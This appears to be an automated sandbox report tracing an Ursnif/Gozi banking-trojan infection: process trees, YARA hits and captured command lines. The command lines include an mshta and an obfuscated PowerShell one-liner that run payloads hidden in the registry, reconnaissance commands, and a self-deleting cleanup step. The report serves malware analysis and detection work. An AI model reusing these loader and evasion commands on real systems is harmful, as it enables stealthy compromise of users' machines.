Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mshta.exePID: 6016, Parent PID: 3528

General

Target ID:	3
Start time:	15:02:02
Start date:	11/10/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ccqf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ccqf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Imagebase:	0x7ff632220000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4292, Parent PID: 6016

General

Target ID:	4
Start time:	15:02:04
Start date:	11/10/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Imagebase:	0x7ff635980000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5672, Parent PID: 4292

General

Target ID:	5
Start time:	15:02:04
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: csc.exePID: 1264, Parent PID: 4292

General

Target ID:	8
Start time:	15:02:16
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Imagebase:	0x7ff707330000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cvtres.exePID: 1312, Parent PID: 1264

General

Target ID:	9
Start time:	15:02:17
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"
Imagebase:	0x7ff77b170000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: csc.exePID: 1236, Parent PID: 4292

General

Target ID:	10
Start time:	15:02:19
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Imagebase:	0x7ff707330000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cvtres.exePID: 5024, Parent PID: 1236

General

Target ID:	11
Start time:	15:02:20
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"
Imagebase:	0x7ff77b170000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: control.exePID: 3692, Parent PID: 1172

General

Target ID:	12
Start time:	15:02:23
Start date:	11/10/2022
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff712ea0000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4672, Parent PID: 3692

General

Target ID:	13
Start time:	15:02:26
Start date:	11/10/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff63f840000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3528, Parent PID: 4292

General

Target ID:	14
Start time:	15:02:29
Start date:	11/10/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff618f60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5656, Parent PID: 3528

General

Target ID:	15
Start time:	15:02:46
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4180, Parent PID: 5656

General

Target ID:	16
Start time:	15:02:46
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: PING.EXEPID: 5948, Parent PID: 5656

General

Target ID:	17
Start time:	15:02:46
Start date:	11/10/2022
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff61b200000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: RuntimeBroker.exePID: 3124, Parent PID: 3528

General

Target ID:	19
Start time:	15:03:14
Start date:	11/10/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6992e0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5760, Parent PID: 3528

General

Target ID:	20
Start time:	15:03:20
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic computersystem get domain \|more > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2760, Parent PID: 5760

General

Target ID:	22
Start time:	15:03:22
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WMIC.exePID: 5296, Parent PID: 5760

General

Target ID:	23
Start time:	15:03:23
Start date:	11/10/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get domain
Imagebase:	0x7ff6b8e40000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: more.comPID: 5996, Parent PID: 5760

General

Target ID:	25
Start time:	15:03:23
Start date:	11/10/2022
Path:	C:\Windows\System32\more.com
Wow64 process (32bit):	false
Commandline:	more
Imagebase:	0x7ff68a6e0000
File size:	28160 bytes
MD5 hash:	28E3DD812331E39AFC3C2B30606E2971
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2176, Parent PID: 3528

General

Target ID:	26
Start time:	15:03:35
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff6ac650000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: RuntimeBroker.exePID: 4372, Parent PID: 3528

General

Target ID:	27
Start time:	15:03:35
Start date:	11/10/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6992e0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5604, Parent PID: 2176

General

Target ID:	28
Start time:	15:03:41
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3960, Parent PID: 3528

General

Target ID:	29
Start time:	15:03:44
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5128, Parent PID: 3960

General

Target ID:	30
Start time:	15:03:53
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: RuntimeBroker.exePID: 4552, Parent PID: 3528

General

Target ID:	31
Start time:	15:03:53
Start date:	11/10/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6992e0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: systeminfo.exePID: 5140, Parent PID: 3960

General

Target ID:	32
Start time:	15:03:53
Start date:	11/10/2022
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo.exe
Imagebase:	0x7ff645c00000
File size:	100864 bytes
MD5 hash:	57D183270FD28D0EBF6C2966FE450739
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3540, Parent PID: 3528

General

Target ID:	34
Start time:	15:03:59
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 5832, Parent PID: 3528

General

Target ID:	35
Start time:	15:03:59
Start date:	11/10/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5004, Parent PID: 3540

General

Target ID:	36
Start time:	15:04:09
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1020, Parent PID: 3528

General

Target ID:	37
Start time:	15:04:11
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2972, Parent PID: 5832

General

Target ID:	38
Start time:	15:04:11
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1948, Parent PID: 1020

General

Target ID:	39
Start time:	15:04:11
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: net.exePID: 4120, Parent PID: 1020

General

Target ID:	40
Start time:	15:04:12
Start date:	11/10/2022
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view
Imagebase:	0x7ff65f370000
File size:	56832 bytes
MD5 hash:	15534275EDAABC58159DD0F8607A71E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1920, Parent PID: 3528

General

Target ID:	41
Start time:	15:04:22
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5300, Parent PID: 1920

General

Target ID:	42
Start time:	15:04:23
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2756, Parent PID: 3528

General

Target ID:	43
Start time:	15:04:25
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff756d70000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 6012, Parent PID: 2756

General

Target ID:	44
Start time:	15:04:26
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6064, Parent PID: 1920

General

Target ID:	45
Start time:	15:04:26
Start date:	11/10/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
